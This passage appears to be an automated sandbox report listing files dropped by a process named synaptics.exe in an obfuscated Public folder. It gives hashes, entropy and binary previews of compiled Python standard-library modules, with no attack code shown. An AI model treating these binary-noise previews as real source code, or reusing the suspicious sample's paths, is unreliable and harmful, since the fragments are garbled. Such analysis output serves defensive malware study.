                                                                                                                                                                                      Preview:o........'-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):56546
                                                                                                                                                                                      Entropy (8bit):5.249930277934686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:NoP8dGbiwEyaNVxLZnkM238oZMpA635Kw9uUFoYH:NW+1LMP0
                                                                                                                                                                                      MD5:8151DD2F38C63F1B9D66144A6A90246A
                                                                                                                                                                                      SHA1:B9A6C9B8425F367AC9F492517126356969EF0A46
                                                                                                                                                                                      SHA-256:D3A053F9B935CB2EBD2B4716703A6281C129EE94664850E8F4651F4689222FAA
                                                                                                                                                                                      SHA-512:481CDAE98BE67B17039B6279FFCDBC027DB6CEA5ABD189F3F9C51B90682F249F39262BB6D94277571F52828948DDEEFB07B6660AE2E2C25C06AB4C1E0300AEE5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                      Entropy (8bit):5.467710098109918
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CDdon2oDAV888oUZ7tDzEMDfdF6ZSdDz0TxkxVGdAZiVxiEa+0:CDdroM9UfD6ZBkrYAZiVkEa+0
                                                                                                                                                                                      MD5:95987344454FDBB327A408F80148A2A4
                                                                                                                                                                                      SHA1:DBA50C88DF77C384A146C87715ADBD5419F1A3A6
                                                                                                                                                                                      SHA-256:BC6EFF95C4A128D77EDEFFEB35C8339DC88E44D9F10D9EA1BB943AA84708638E
                                                                                                                                                                                      SHA-512:CB4498AF74814F5B7302C5CA7C739B0DFA01B183010E2C4277F2732F8D581B7E98E5E83FD27EA34F04E05A45436D4356A84E0228E5236A61334D861C2043C415
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dPP.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...g.d...e...Z.[.e.j.e.j.e.j.e.e.e.f.Z.e.d...Z.d.e.d.f.e.d.f.e.d.f.f.Z.e.d...Z.d.Z.d.d...Z.dVd.d.d...d.d...Z.dVd.d...d.d...Z.d.d.d.d.d.d.d.d.d.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d.d...d(d)..Z.e.. d*d+..Z!d,e!j"_.d-e!j._.d.e!j#_.d/e!j$_.d0e!j%_.d1e!j&_.d2e!j'_.d3e!j(_.d4Z)d5Z*G.d6d7..d7e!..Z+d.d8..d9d:..Z,d;d<..Z-d=d>..Z.....dWd?d@..Z/dXd.d...dBdC..Z0d.d.d...dDdE..Z1....dYd.d.dF..dGdH..Z2dIdJ..Z3e0Z4dKdL..Z5dMdN..Z6dOdP..Z7G.dQdR..dR..Z8dSdT..Z9e:dUk...r.e9....d.S.d.S.)Zz0Disassembler of Python byte code into mnemonics......N)...*)...__all__)...code_info..dis..disassemble..distb..disco..findlinestarts..findlabels..show_code..get_instructions..Instruction..Bytecode..FORMAT_VALUE).N....str..repr..ascii..MAKE_FUNCTION)...defaults..kwdefaults..annotationsZ.closurec....................C...s4...z.t.|.|.d...}.W.|.S...t.y.......t.|.|.d...}.Y.|.S.w.).z.Attempts to compile the given source, fir
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26076
                                                                                                                                                                                      Entropy (8bit):5.281841752125299
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:EXTKNlN1WNI0LUjkGo9dwskW5nW3jj82kV0GVH5sH9LBu0KlGVa+3I:ED0N1BFIdwFJ3XcvVHWBBZ+GVaN
                                                                                                                                                                                      MD5:7C57048FC0F3C70E0EC8EF78E5A75039
                                                                                                                                                                                      SHA1:0599D6FF1333F799AF6C9E3A5818B78B44042472
                                                                                                                                                                                      SHA-256:049500D68CE07950C2312507758D1450E1F58A92B3E9BFD71CBF2C26157AC2D5
                                                                                                                                                                                      SHA-512:5F1462BD7F2616CD0031547B7955345F85F42925D015708CBF958ECCD53F8B5F3587FF9DB680A52558E1CAF5F374EA0D4CB170B7490DB63EA9CD84A4B69B3001
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....(C:\Users\Public\QExvbmVOb25l\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4257
                                                                                                                                                                                      Entropy (8bit):5.6699325806902365
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rZ1NvFl7gPHnHns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:r1vFl7g/HnsV7g7HzTRbdUV
                                                                                                                                                                                      MD5:BB53BE48728605E42B055F6A4A417DD8
                                                                                                                                                                                      SHA1:E389FB3B0FF235A1D0005CC01E486BDCDBE8D346
                                                                                                                                                                                      SHA-256:35874B2E09D1095038C3A541FFEFBB27452F807ECC95AC1C44AD75C841B6229E
                                                                                                                                                                                      SHA-512:EA2A66135115ACA2C75EC8A4E1D3618267FCF4EE5FE8C3CCE4FDF7ABACA6FB9C46948CF7841580295EE762D4DE31BE3723C7BD5D2D209CE8E87855DFE222710A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28348
                                                                                                                                                                                      Entropy (8bit):5.34686521614029
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:8oO3KwCQNi3/sZoyIw/kj6N4V9xI8HkXRssPmCzCe/:8o1FQNi30Cj6iV9hHkhsm7me/
                                                                                                                                                                                      MD5:4AFFB5CA18395D2BFADF605C03A6E355
                                                                                                                                                                                      SHA1:3C50CE51D055E4D19B55B485C9FB689819BC7F51
                                                                                                                                                                                      SHA-256:E5D5CAB466D60B6FCF0D2DA5ED3696F17D93CC0C8681BCD297F5F7E62AE8ED02
                                                                                                                                                                                      SHA-512:9D1854016698F9774933EFE5C060F8836E9432E6A57E7523639FEDB0443CE6F27FE4925E963AD64812038E3256CB30431356D12B8B3FE432898F28D42C041C93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3920
                                                                                                                                                                                      Entropy (8bit):5.173903194720584
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uqsfAs4EvyosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:Fs4rtKyow8/tjgqWoZ
                                                                                                                                                                                      MD5:19F3748F57EF10D994F72A07C1E0499C
                                                                                                                                                                                      SHA1:EB272A2AE0FDFC8B7C8AAE6D598AB520FE37962B
                                                                                                                                                                                      SHA-256:276CCE8EE5FAB78B2EA97635A1622C5E6817963860BD3531BC5F967E31C88A85
                                                                                                                                                                                      SHA-512:A0020A5541458120126F4CDAF6534788C64C4F98F7CE89D6A523241EBBFCD581595A18DD9F1AA48184132D758DC7F9A6A5B0C24DACB955CF649378B19F0C2DAA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r...../C:\Users\Public\QExvbmVOb25l\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5865
                                                                                                                                                                                      Entropy (8bit):5.142368507125213
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:j77f2UQQ4yZswKLQ4yZs9UfK9BCjbAOp280dqZqh3qX0GqQC7xr8HqRRqhBQoSqj:CXQ7ZQLQ7Z6UC7CjbrpteqZqBqX1qQCW
                                                                                                                                                                                      MD5:A61E70604F2586EB9CA34838D070C522
                                                                                                                                                                                      SHA1:7F1D9E54D4CDCCB54BB41873ACDCEB9995EB99A6
                                                                                                                                                                                      SHA-256:E87C90F8983C1D9DD7892F8DF73C9D88F9BC0AFFB9BA6510846CF6415D65DABA
                                                                                                                                                                                      SHA-512:FC74B66D1FFF971B129A1C797BB9863F2FCFD8738C03B469DAC45E7C0D24F93C29D59781F2C9CB8468DA1AFB5CFDF8C9FDF1F78C71C4A03A0368AA10374D48EA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.d.d...d.d...Z.d.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e...d"..Z.e...d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.e.j.e.e.d,d...B.Z d.S.)-z.Filename globbing utility......N)...glob..iglob..escapeF....root_dir..dir_fd..recursivec....................C...s....t.t.|.|.|.|.d.....S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. r....)...listr....)...pathnamer....r....r......r.....(C:\Users\Public\QExvbmVOb25l\lib\glob.pyr........s......r....c....................C...s....t...d.|.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6858
                                                                                                                                                                                      Entropy (8bit):5.6005305335018924
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:IdPjhwzUgQUdROKh0WXI7dQia/PE6sxt6iojyyt8NQCcx54bNdO9DF4irm/NMlSV:IRmE5+odQia3EJxtv4OmVP/4X2J4hg0
                                                                                                                                                                                      MD5:57D4CFA336C5B5F9197843C13B27C0CA
                                                                                                                                                                                      SHA1:475391705316F1EBA7A35F13F7BC64739D249981
                                                                                                                                                                                      SHA-256:BF02BDB8469AEFFAB406357D1A707B325FA0EF8709063E54B42C9F00680BABBF
                                                                                                                                                                                      SHA-512:8A31E4747A7193E2A8C7CA3B85DC1ABE6126B95D93C35AF6ED8A9205B5CAEC309B36237CC7928289257DDAADCB7C0DE0ADB15C5C96BA2B1B8E0403E7CB5AB598
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13878
                                                                                                                                                                                      Entropy (8bit):5.354220422069604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ynqTYZnQtot7ItafyjjWya/PX1FGRxibJWiTqe0hN2leov+Ugn:ynEYZn0ot7It7j3aX1gRxiM0uN2kk+/n
                                                                                                                                                                                      MD5:25263BE9F31D3B221CDA1709DA5133E3
                                                                                                                                                                                      SHA1:5ADC962AB28CD3BA3BCA15A83938219EF1088E29
                                                                                                                                                                                      SHA-256:04676B577706905227D29ED2A672D792AA9F272C114F487AA0A145D785883129
                                                                                                                                                                                      SHA-512:C1EDE307577B1611CEF580FCDE0650E288F577A4272DE64B4399418EDAE544450BC9C5C69EBE1F87C602BF79B0AA697A0FE2533DBB97FAA321ECD3E30C02D671
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6986
                                                                                                                                                                                      Entropy (8bit):5.299114930107523
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:L+FTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:L+FT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                      MD5:3B8718E9231054E1A9E52CD41A16C5DD
                                                                                                                                                                                      SHA1:D64AF307C65F741D0FCBE944270B8A2B288A2A38
                                                                                                                                                                                      SHA-256:A8379736EB3DBA94C7E479F1EC8734536787747C82FF43CABEFEBD3AA7343D2E
                                                                                                                                                                                      SHA-512:711066D8FB0A259A0068E08793AD7FDEF510934F6E66E180D0D617B6561322181437463E9C8A6F1450EEE4C656E6B9B54C2D4DAC74A1D714E5AF70CBD3D2FBAB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....(C:\Users\Public\QExvbmVOb25l\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):85166
                                                                                                                                                                                      Entropy (8bit):5.490092865884726
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:QRc0NzW1X0tJcqYqOWjXHdV352ox842jTk9VBbL+xSjiN2TjJXTpsWTp5JQVXiG0:QRvtW1o737HdV35KNPKmwHtQVSG82IQk
                                                                                                                                                                                      MD5:459415DCF56CFBA3FBEC2E1BC729F0AC
                                                                                                                                                                                      SHA1:2FD76C28D51EFD48F0AF19CEE95EB72BA6422BAC
                                                                                                                                                                                      SHA-256:180A5BFD31F0499BD160C428C5A0D17ABCD3047BC98D9F8655B3CC1C56B3D5DC
                                                                                                                                                                                      SHA-512:E2272CBE052000029557473AFC45FB0F91379AA3BC8E4938AB10A611D90A771584D9971BCE5AEFF872A13764058D81F9734EB76DA958557DAFB3DDFF0D0533C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...Z.e.j.....D.].\.Z.Z.e.e.d.e...<.q^d.Z.d.d.d.d...d.d...Z d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e&e.d...r.d.d...Z(n.d.d...Z(d.d...Z)d d!..Z*d"d#..Z+d$d%..Z,d&d'..Z-d(d)..Z.d*d+..Z/d,d-..Z0d.d/..Z1d0d1..Z2d2d3..Z3d4d5..Z4d6d7..Z5d8d9..Z6d:d;..Z7d.d<d=..Z8e.d>d?..Z9d@dA..Z:dBdC..Z;d.dD..dEdF..Z<dGdH..Z=dIdJ..Z>dKdL..Z?dMdN..Z@dOdP..ZAdQdR..ZBdSdT..ZCdUdV..ZDd.dWdX..ZEi.ZFi.ZGd.dYdZ..ZHG.d[d\..d\eI..ZJG.d]d^..d^e.jK..ZLd_d`..ZMdadb..ZNG.dcdd..ddeI..ZOG.dedf..df..ZPdgdh..ZQdidj..ZRdkdl..ZSdmdn..ZTd.dodp..ZUe.dqdr..ZVdsdt..ZWe.dudv..ZXdwdx..ZYe.dydz..ZZd{d|..Z[e.d}d~..Z\d.d...Z]d.d.d...Z^d.d...Z_d.d.d.d.i.i.e`d.d...d.d...d.d...d.d...e^f.d.d...Zae`d.d...d.d...d.d...f.d.d...Zbd.d...Zcd.d...Zdd.d...Zee.d.d...Zfd.d...Zge.d.d...Zhd.d.d...Zid.d...Zje.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3676
                                                                                                                                                                                      Entropy (8bit):5.3972600816288
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:7jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwG8POcGcMzzMfSWI:7UK0iSxOmoWF2vLAy/hy8P7GcmYa7RXn
                                                                                                                                                                                      MD5:5EC5293CF8812BA369E7F7265F6C7352
                                                                                                                                                                                      SHA1:6402078F1D345F28998103D56E8C1A393CDC86CD
                                                                                                                                                                                      SHA-256:771129848349DF76B7EFAC47E985ACF72FA4AD8C735CF99CEED191502807065E
                                                                                                                                                                                      SHA-512:596D1FFD992710FFD71CD7ACC2284598F978FD988D4CBF7FCD9C0E8ADBA618A9953CB374DB4704D6485B0B3711BA3F661221276B25AFCFA380A0500AC39A0525
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61464
                                                                                                                                                                                      Entropy (8bit):5.306395675246755
                                                                                                                                                                                      Encrypted:false
